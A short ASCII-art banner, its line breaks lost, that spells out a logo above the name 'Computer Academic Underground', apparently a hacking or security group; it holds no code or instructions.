/ \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground